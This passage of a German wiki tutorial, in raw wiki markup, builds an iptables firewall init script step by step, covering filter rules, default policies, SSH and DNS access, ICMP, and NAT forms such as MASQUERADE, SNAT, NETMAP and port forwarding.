 root@hutze:~# touch firewall&lt;br /&gt;
 root@hutze:~# mv firewall /etc/init.d&lt;br /&gt;
 root@hutze:~# ln -s /etc/init.d/firewall /etc/rc2.d/S99firewall&lt;br /&gt;
&lt;br /&gt;
==Positionierung der Firewall ab Ubuntu 16.04==&lt;br /&gt;
Ab Ubuntu 16.04 wurde das übliche init durch das neue systemd ersetzt. Daher muss die Firewall in /usr/local/sbin platziert werden und wie im unteren Link angegeben der Service-File erstellt werden&lt;br /&gt;
*[[Systemd#Service_File]]&lt;br /&gt;
&lt;br /&gt;
==Der Rumpf==&lt;br /&gt;
Zuerst wird in dem firewall-Skript ein case start - stop Block angelegt:&lt;br /&gt;
&lt;br /&gt;
 '''#!/bin/bash'''&lt;br /&gt;
 '''case $1 in'''&lt;br /&gt;
 '''start)'''&lt;br /&gt;
 '''echo &amp;quot;starte firewall&amp;quot;'''&lt;br /&gt;
 ''';;'''&lt;br /&gt;
 '''stop)'''&lt;br /&gt;
 '''echo &amp;quot;stoppe firewall&amp;quot;'''&lt;br /&gt;
 ''';;'''&lt;br /&gt;
 '''*)'''&lt;br /&gt;
 '''echo &amp;quot;usage: $0 start|stop&amp;quot;'''&lt;br /&gt;
 ''';;'''&lt;br /&gt;
 '''esac'''&lt;br /&gt;
&lt;br /&gt;
==Filter Tabelle==&lt;br /&gt;
Beginnen wir unsere Firewall mit ihrer simpelsten Funktion: dem Paketfilter.&lt;br /&gt;
===Flushing===&lt;br /&gt;
&lt;br /&gt;
Bevor wir unsere eigenen Regeln entwerfen, sollten wir sichergehen das sich keine alten Regeln einschleichen und zu unerwarteten Komplikationen führen.&lt;br /&gt;
Dieses wird durch das sogenannte &amp;quot;flushing&amp;quot; erreicht, welches mit folgender Zeile geschieht:&lt;br /&gt;
  #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 '''iptables -F'''&lt;br /&gt;
 '''iptables -t nat -F'''&lt;br /&gt;
 '''iptables -t mangle -F'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 '''iptables -F'''&lt;br /&gt;
 '''iptables -t nat -F'''&lt;br /&gt;
 '''iptables -t mangle -F'''&lt;br /&gt;
&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
Ohne flushing kann es auch passieren das sich unsere Regeln bei jedem Neustart der Firewall addieren.&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:Der Operand '''-F''' löst das flushing aus mit dem alle Regeln in der angegebenen Tabelle ( hier &amp;quot;-t filter&amp;quot; da keine angegeben ) entfernt werden&lt;br /&gt;
&lt;br /&gt;
;Wichtig&lt;br /&gt;
:Wenn man zukünftig auch Regeln in die ''nat'' und ''mangle'' Tabellen schreiben möchte, muss man dazu sichergehen das auch diese bei jedem Start und Stop jeweils geflusht werden damit keine Komplikationen entstehen.&lt;br /&gt;
&lt;br /&gt;
===Default policy===&lt;br /&gt;
&lt;br /&gt;
Als nächstes definieren wir was passieren soll falls keine unserer Regeln zutreffen sollte, auch gennannt '''&amp;quot;default policy&amp;quot;'''&lt;br /&gt;
&lt;br /&gt;
Dies geschieht mit folgenden Zeilen:&lt;br /&gt;
&lt;br /&gt;
  #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 '''iptables -P INPUT DROP'''&lt;br /&gt;
 '''iptables -P OUTPUT DROP'''&lt;br /&gt;
 '''iptables -P FORWARD DROP'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 '''iptables -P INPUT ACCEPT'''&lt;br /&gt;
 '''iptables -P OUTPUT ACCEPT'''&lt;br /&gt;
 '''iptables -P FORWARD ACCEPT'''&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:Wie in Syntax Allgemein angegeben muss die '''&amp;quot;default policy&amp;quot;''' auf alle 3 Anlaufstellen angewendet werden.&lt;br /&gt;
:Nach der Anlaufstelle geben wir an was mit den Paketen zu tun ist.&lt;br /&gt;
:Mit '''DROP''' lässt die gestartete Firewall alle Pakete fallen die nicht auf eine Regel passen.&lt;br /&gt;
:Mit '''ACCEPT''' lässt die gestoppte Firewall alle Pakete durch.&lt;br /&gt;
&lt;br /&gt;
===ESTABLISHED und RELATED Pakete===&lt;br /&gt;
&lt;br /&gt;
Ein Vorteil von iptables zu seinen Vorgängern ist die Funktion seinen Paketfilter nur auf die ersten Pakete einer Verbindung zu begrenzen und so Ressourcen zu sparen.&lt;br /&gt;
&lt;br /&gt;
Dieses wird erreicht mit folgenden Zeilen&lt;br /&gt;
&lt;br /&gt;
  #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 '''iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'''&lt;br /&gt;
 '''iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT'''&lt;br /&gt;
 '''iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:Die neuen Funktionen die wir hier verwenden beinhalten:&lt;br /&gt;
:'''-m state''': Das Modul von iptables das erkennt ob ein Paket eine Verbindung initiiert oder zu einer bereits errichteten Verbindung gehört. &lt;br /&gt;
:'''--state ESTABLISHED,RELATED''': Der Status nach dem das Paket untersucht wird, wobei&lt;br /&gt;
:'''ESTABLISHED''': Für alle Pakete steht die nicht das erste Paket einer Verbindung ist die in beide Richtungen sendet. (TCP)&lt;br /&gt;
:'''RELATED''': Für alle Pakete steht die eine 2t Verbindung öffnen wollen. (FTP,ICMP)&lt;br /&gt;
:'''-j ACCEPT''': Benutzt die angegebene Operation auf das Paket, hier ACCEPT.&lt;br /&gt;
&lt;br /&gt;
===loopback device===&lt;br /&gt;
&lt;br /&gt;
Nun haben wir schon ein paar Regeln aber noch keine die bisher zutreffen kann. Wenn wir diese Firewall aktivieren würden wäre unser eigener Router Nichtmal mehr in der Lage mit sich selbst zu kommunizieren. Da er dies über das sogennante '''&amp;quot;loopback device&amp;quot;''' lassen wir jetzt unsere ersten Pakete durch.&lt;br /&gt;
&lt;br /&gt;
  #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 '''iptables -A OUTPUT -o lo -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 '''iptables -A INPUT -i lo  -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:Hier geben wir nun zum ersten mal zur Anlaufstelle auch das jeweilige Interface das angelaufen wird mit an:&lt;br /&gt;
:Mit '''-o lo''' beschreiben wir als ''output'' also Ausgang die Schnittstelle ''lo'' was für das loopback device steht&lt;br /&gt;
:Genauso '''-i lo''' wobei lo hier als Eingang angegeben wird. In einem Satz:&lt;br /&gt;
:Alle Pakete die von unserem Router aus lo Ausgehen durchlassen&lt;br /&gt;
:Alle Pakete die an unserem Router an lo Ankommen durchlassen&lt;br /&gt;
&lt;br /&gt;
===Fernwartung===&lt;br /&gt;
&lt;br /&gt;
Angenommen unser Router mit der Firewall steht nicht im selben Netz wie unser üblicher Arbeitsrechner, ist es von Vorteil auch von außen auf ihn zugreifen zugreifen zu können. In unserem Beispiel ist das äußere Netz auch ein LAN. &lt;br /&gt;
  #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 '''iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''-s''': Passt auf die angegebene Quell IP-Adresse, hier 192.168.241.10&lt;br /&gt;
:'''-p''': Passt auf ein Protokoll, hier tcp&lt;br /&gt;
:'''-dport''': Passt auf Ziel Port, hier 22 (ssh)&lt;br /&gt;
:'''--state NEW''': Passt auf Pakete die eine Verbindung Initiieren&lt;br /&gt;
===Adressen zusammenfassen===&lt;br /&gt;
 '''iptables -A INPUT -i eth0 -s 192.168.241.10,10.81.3.1 -p tcp --dport 22 -m state --state NEW -j ACCEPT'''&lt;br /&gt;
&lt;br /&gt;
===DNS-Server und HTTP===&lt;br /&gt;
&lt;br /&gt;
Jetzt möchten wir mit unserem Router ins Internet gehen können. Dazu müssen wir 2 Dinge tun, zuerst müssen wir erlauben das er auf DNS-Server zugreifen kann.&lt;br /&gt;
&lt;br /&gt;
  #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT&lt;br /&gt;
 '''iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 '''iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''-d''': Das selbe Prinzip wie auch bei '''-s''' aber auf eine Ziel Adresse&lt;br /&gt;
----&lt;br /&gt;
Dann müssen wir auch noch eine Regel für HTTP aufstellen damit wir auch Internetseiten aufrufen dürfen&lt;br /&gt;
  #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 '''iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
===ICMP===&lt;br /&gt;
&lt;br /&gt;
Jetzt wollen wir testen können ob unser Router erreichbar ist. Dazu müssen wir ICMP freischalten&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT&lt;br /&gt;
 '''iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''--icmp-type 8''' Beschränkt erlaubte ICMP Pakete auf typ 8 ( echo )&lt;br /&gt;
&lt;br /&gt;
==NAT Tabelle==&lt;br /&gt;
&lt;br /&gt;
NAT steht für Network Address Translation, also eine Übersetzung von Netzwerk Adressen, sei es in Namen oder auch einfach nur in andere IP-Adressen. Iptables kann diesen Job übernehmen und zwar auf verschiedene Art und Weise.&lt;br /&gt;
&lt;br /&gt;
;Wichtig&lt;br /&gt;
:Da wir nun beginnen NAT regeln in die firewall zu schreiben dürfen wir nicht vergessen die Zeile zum flushen eben jener hinzuzufügen&lt;br /&gt;
&lt;br /&gt;
===MASQUERADE===&lt;br /&gt;
&lt;br /&gt;
Masquerading ist wohl die simpelste Form von NAT, hiermit ersetzt der Router einfach jede Quell IP-Adresse jedes zu routenden Paketes mit seiner eigenen, sowie bei einem Antwort Paket die Ziel Adresse wieder mit der Original Quell Adresse.In iptables erreicht man diese Funktion mit folgender Zeile&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 '''iptables -F -t nat'''&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT&lt;br /&gt;
 '''iptables -t nat -A POSTROUTING -s 172.23.242.0/24 -j MASQUERADE -o eth0 '''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 '''iptables -F -t nat'''&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''-t nat''': Hier sehen wir zum ersten mal wie man eine andere Tabelle außer Filter anspricht&lt;br /&gt;
:'''POSTROUTING''': Damit der Router weiß das er den Adressen Tausch NACH dem Routing ausführen soll&lt;br /&gt;
:'''-j MASQUERADE''': Eine weitere Aktion die auf ein Paket ausgeführt werden kann, hier unser NAT&lt;br /&gt;
:'''-s 172.23.242.0/24''': Hier wird nicht nur eine IP-Adresse, sondern ein ganzer Netzbereich als Quelle angegeben&lt;br /&gt;
&lt;br /&gt;
===FORWARD===&lt;br /&gt;
Um den an die Firewall angeschlossenen Rechnern einen Netzzugang zu gestatten müssen wir deren DNS Anfragen zulassen&lt;br /&gt;
 &lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 '''iptables -F -t nat'''&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT&lt;br /&gt;
 iptables -t nat -A POSTROUTING -s 172.23.242.0/24 -j MASQUERADE -o eth0 '''&lt;br /&gt;
 '''iptables -A FORWARD -i vmbr1 -o vmbr0 -p tcp --dport 53 -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 '''iptables -A FORWARD -i vmbr1 -o vmbr0 -p udp --dport 53 -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 &lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 '''iptables -F -t nat'''&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''-i ''': Hier wird die Schnittstelle definiert auf der die Anfragen an die Firewall eingehen&lt;br /&gt;
:'''-o''': Hier wird die Schnittstelle definiert auf die Anfragen die Firewall verlassen&lt;br /&gt;
:'''FORWARD''': Damit die Firewall weiß, dass das Paket weitergeleitet werden soll&lt;br /&gt;
:'''--dport''': Hier wird der Zielport der Anfragen definiert&lt;br /&gt;
&lt;br /&gt;
===MULTIPORT===&lt;br /&gt;
&lt;br /&gt;
Ausser dem DNS müssen zum arbeiten noch andere Ports geöffnet werden. Um nicht für jeden eine einzelne Regel anlegen zu müssen bietet sich die Nutzung des Parameters Multiport an.&lt;br /&gt;
&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 '''iptables -F -t nat'''&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p udp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp --dport 80 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -p icmp --icmp-type 8 -j ACCEPT&lt;br /&gt;
 iptables -t nat -A POSTROUTING -s 172.23.242.0/24 -j MASQUERADE -o eth0 '''&lt;br /&gt;
 iptables -A FORWARD -i vmbr1 -o vmbr0 -p tcp --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -i vmbr1 -o vmbr0 -p udp --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
 '''iptables -A FORWARD -i vmbr1 -o vmbr0 -p tcp -m multiport --dport 22,25,80,443,143 -m state --state NEW -j ACCEPT'''&lt;br /&gt;
 ;;&lt;br /&gt;
 stop)&lt;br /&gt;
 echo &amp;quot;stoppe firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 '''iptables -F -t nat'''&lt;br /&gt;
 iptables -P INPUT ACCEPT&lt;br /&gt;
 iptables -P OUTPUT ACCEPT&lt;br /&gt;
 iptables -P FORWARD ACCEPT&lt;br /&gt;
 ;;&lt;br /&gt;
 esac&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
&lt;br /&gt;
:'''-m multiport''': Hiermit weiß die Firewall, daß unter '''--dport''' mehrere Ports hinterlegt wurden&lt;br /&gt;
&lt;br /&gt;
===SNAT===&lt;br /&gt;
&lt;br /&gt;
SNAT ist Masquerading sehr ähnlich, der einzige Unterschied besteht darin das man sich bei SNAT die ersetzende IP-Adresse wählen kann. Da wir schon Masquerading eingebaut haben, hängen wir SNAT nicht auch noch mit in unsere Firewall.&lt;br /&gt;
&lt;br /&gt;
Hier aber ein Beispiel:&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j SNAT -o eth0 -s 172.23.242.0/24 --to-source 192.168.242.100&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''-j SNAT''': Die auszuführende Aktion, hier SNAT&lt;br /&gt;
:'''--to-source 192.168.242.100''': Die Angabe zu welcher IP-Adresse ersetzt wird, hier die des Routers.&lt;br /&gt;
&lt;br /&gt;
===NETMAP===&lt;br /&gt;
&lt;br /&gt;
Eine weiter Form des NAT in iptables ist NETMAP. Statt wie bei MASQUERADE oder SNAT, ersetzt NETMAP die Quell Adresse nicht nur mit einer bestimmten Adresse, sondern bildet das gesamte Quell Netz auf ein anderes ab.&lt;br /&gt;
&lt;br /&gt;
SNAT-Beispiel:&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j NETMAP -o eth0 -s 172.23.242.0/24 --to 195.145.95.0/24&lt;br /&gt;
&lt;br /&gt;
DNAT-Beispiel:&lt;br /&gt;
 iptables -t nat -A PREROUTING -j NETMAP -i eth0 -d  195.145.95.0/24 --to 172.23.242.0/24&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
;Verwendete Syntax&lt;br /&gt;
:'''-j NETMAP''': Aktion die auf Pakete ausgeführt wird, hier NETMAP&lt;br /&gt;
:&lt;br /&gt;
&lt;br /&gt;
===DNAT, port forwarding===&lt;br /&gt;
&lt;br /&gt;
Da das interne Netz nicht von außen angesprochen werden kann, wie es bei normalen Routern die ins Internet führen ja auch der Fall ist, bedient man sich hierfür einer Technik namens port forwarding, was bedeutet das ein Programm das über einen bestimmten Port mit dem Router kommuniziert an eine andere IP-Adresse und einen anderen Port weitergeleitet wird.&lt;br /&gt;
 #!/bin/bash&lt;br /&gt;
 case $1 in&lt;br /&gt;
 start)&lt;br /&gt;
 echo &amp;quot;starte firewall&amp;quot;&lt;br /&gt;
 iptables -F&lt;br /&gt;
 iptables -F -t nat&lt;br /&gt;
 iptables -P INPUT DROP&lt;br /&gt;
 iptables -P OUTPUT DROP&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i lo -j ACCEPT&lt;br /&gt;
 iptables -A INPUT -i eth0 -s 192.168.241.10 -p tcp --dport 22 -m state --state NEW -j ACCEPT&lt;br /&gt;
 iptables -A OUTPUT -o eth0 -p tcp -d 192.168.240.21 --dport 53 -m state --state NEW -j ACCEPT&lt;br /&gt;
